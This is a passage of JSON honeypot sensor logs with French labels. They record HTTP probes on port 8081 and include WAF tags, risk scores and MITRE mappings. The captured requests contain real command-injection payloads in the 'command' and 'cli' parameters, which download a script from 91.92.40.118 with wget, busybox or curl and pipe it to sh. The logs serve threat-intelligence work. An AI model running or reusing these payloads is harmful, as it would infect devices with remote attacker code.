-\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/api\/v1\/status\u0022, \u0022query_string\u0022: \u0022command=`cd\u0022, \u0022waf_tags\u0022: [\u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022nosqli-3\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=`cd HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/api\/v1\/status?command=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s xiaomi;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s xiaomi;curl http:\/\/91.92.40.118\/wget.sh|sh -s xiaomi` HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nConnection: close\\r\\n\\r\\n\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/v1\/status?command=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s xiaomi;busybox wget http:\/\/91.92.40.118\/wget.sh -\u0022, \u0022classification_reason\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-14) \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022mitre_tactics\u0022: [\u0022TA0007\u0022, \u0022TA0001\u0022], \u0022mitre\u0022: \u0022TA0007\u0022, \u0022threat_family\u0022: [\u0022unknown\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022963a558a4ae02cf1db80b4e23f2d62c255601156\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/api\/v1\/status\u0022, \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/api\/v1\/status?command=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s xiaomi;busybox wget http:\/\/91.92.40.118\/wget.sh -\u0022, \u0022attack_vector\u0022: \u0022rest api enum \u00b7 via HTTP:8081 \u00b7 (sonde \/ probe) \u00b7 \u2192 \/api\/v1\/status\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 4 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-14) \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-14) \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 61\/100 (Moyen) \u2014 MITRE TA0007 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 60.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 61}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022attack_stage_label\u0022: \u0022Sonde \/ probe\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022risk_score\u0022: 61, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1190-api\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022, \u0022INT-api-probe-generic\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1190-api\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022, \u0022Api Probe Generic\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0007\u0022, \u0022mitre_technique\u0022: \u0022TA0007\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/api\/v1\/status\u0022, \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=`cd HTTP\/1.1\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022rest api enum \u00b7 via HTTP:8081 \u00b7 (sonde \/ probe) \u00b7 \u2192 \/api\/v1\/status\u0022, \u0022evidence_snippet\u0022: \u0022GET \/api\/v1\/status?command=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s xiaomi;busybox wget http:\/\/91.92.40.118\/wget.sh -\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 4 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 4 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022discovery\u0022, \u0022label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_api_route_probe\u0022, \u0022http_k8s_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"\/tmp;wget","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950468:nosqli-3\u0022, \u0022950600:k8s-api\u0022, \u0022http_api_route_probe\u0022, \u0022http_k8s_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":245},{"id":11809703,"ip":"45.153.34.252","ts":"2026-07-14 02:29:53.000000","proto":"tcp","src_port":35692,"dst_port":8081,"service":"http","classification":"config_file_probe","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u002236a2335d4f2b979a1e3edec5c7dfb201adb24fc1\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 276, \u0022payload_entropy\u0022: 5.058056085101254, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 13, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022a227991147f9c397c2546ae301c6733dfe8f5d11\u0022, \u0022event_fingerprint\u0022: \u00224e5a90a10b03a0f2a401e64cfb9602ce7adaf85d\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022fda664f69d767298695d039f21fd0165\u0022, \u0022path_pattern_hash\u0022: \u0022f6e9baaa731f11923b2ba9541a8713d5\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022query_string\u0022: \u0022cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022query_string\u0022: \u0022cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nC\u0022, \u0022payload_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00225b071a60aab34811072b66c7d8aadbe2b2549b45\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.s\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_sensitive_path\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":276},{"id":11809702,"ip":"45.153.34.252","ts":"2026-07-14 02:29:52.000000","proto":"tcp","src_port":35688,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/command.php","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u0022387fa52c89852ad587baa76ccfb83021cdde7544\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 306, \u0022payload_entropy\u0022: 5.174073401655628, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, 